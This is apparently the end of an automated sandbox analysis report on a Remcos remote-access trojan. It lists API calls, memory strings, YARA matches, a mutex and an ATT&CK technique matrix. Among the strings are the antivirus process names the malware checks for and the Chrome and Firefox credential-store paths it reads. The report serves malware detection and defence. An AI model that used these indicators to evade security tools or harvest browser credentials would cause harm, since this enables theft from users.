                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,25_2_00007FF67DEF4E98
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\85q3
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\T3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000781000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000781000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrasystem.com:
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerN|
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\q3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093313591.000000000083B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerP|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\h3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager*|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\
                    Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerZ3
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\]3
                    Source: sppsvc.pif, 0000001C.00000002.4503603032.000000000083C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager%|
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQD\\sppsvc.pif|
                    Source: sppsvc.pif, 0000001C.00000002.4535688686.0000000033C34000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4501499692.0000000000765000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA24C52 cpuid 28_2_1BA24C52
                    Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF789BD51EC
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF789BD3140
                    Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF789BD51EC
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF789BD3140
                    Source: C:\Users\Public\kn.exe Code function: LoadLibraryW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,25_2_00007FF67DF43800
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: CoInitialize,WinExec,EnumSystemLocalesA,28_2_028ACE0C
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesA,28_2_028B3AD5
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoA,28_2_1B9FF8D1
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW,28_2_1BA4230A
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW,28_2_1BA42313
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW,28_2_1BA388ED
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW,28_2_1BA42036
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW,28_2_1BA41F9B
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW,28_2_1BA41F50
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,28_2_1BA42610
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW,28_2_1BA42543
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,28_2_1BA41CD8
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_1BA4243C
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: EnumSystemLocalesW,28_2_1BA38404
                    Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,29_2_00007FF789BD51EC
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,29_2_00007FF789BC6EE4
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,29_2_00007FF789BD3140
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,36_2_029A5A3C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,36_2_029BCE0C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,36_2_029BCE0C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoA,36_2_029AA6F8
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoA,36_2_029AA744
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,36_2_029C3AD6
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,36_2_029A5B48
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW,36_2_210B2036
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,36_2_210B20C3
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,36_2_210B2313
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,36_2_210B2543
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW,36_2_210A8404
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,36_2_210B243C
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,36_2_210B2610
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoA,36_2_2106F8D1
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: GetLocaleInfoW,36_2_210A88ED
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,36_2_210B1CD8
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW,36_2_210B1F50
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: EnumSystemLocalesW,36_2_210B1F9B
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF789BC6EE4
                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE98018 GetUserNameExW,GetLastError,#357,wcschr,TranslateNameW,GetLastError,#359,#145,GetLastError,#73,#357,#208,#36,#26,GetLastError,#140,#357,LocalFree,#41,#224,#13,25_2_00007FF67DE98018
                    Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1BA39365 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,28_2_1BA39365
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF789BC586C GetVersion,4_2_00007FF789BC586C
                    Source: C:\Users\Public\xkn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 36_2_2106BA12
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 36_2_2106BB30
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: \key3.db 36_2_2106BB30

                    Remote Access Functionality

                    Source: C:\Users\Public\Libraries\sppsvc.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3A6IQD
                    Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: cmd.exe 36_2_2106569A
                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE75648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,25_2_00007FF67DE75648
                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE554A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,25_2_00007FF67DE554A0
                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,25_2_00007FF67DE6E568
                    Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,25_2_00007FF67DE5227C
MITRE ATT&CK Matrix (the report's per-technique count badges are kept as extracted, in front of the technique name)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
Execution: 21 Windows Management Instrumentation; 12 Native API; 2 Command and Scripting Interpreter; 2 Service Execution; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; 1 Windows Service; 11 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Bypass User Account Control; 2 Valid Accounts; 21 Access Token Manipulation; 1 Windows Service; 22 Process Injection; 11 Registry Run Keys / Startup Folder; At; Cron; Launchd; Scheduled Task; Systemd Timers
Defense Evasion: 311 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 Install Root Certificate; 1 Timestomp; 1 DLL Side-Loading; 1 Bypass User Account Control; 211 Masquerading; 2 Valid Accounts; 51 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 22 Process Injection
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 1 System Network Connections Discovery; 3 File and Directory Discovery; 58 System Information Discovery; 61 Security Software Discovery; 51 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; Process Discovery; Permission Groups Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: 12 Archive Collected Data; 211 Input Capture; 3 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
Command and Control: 14 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
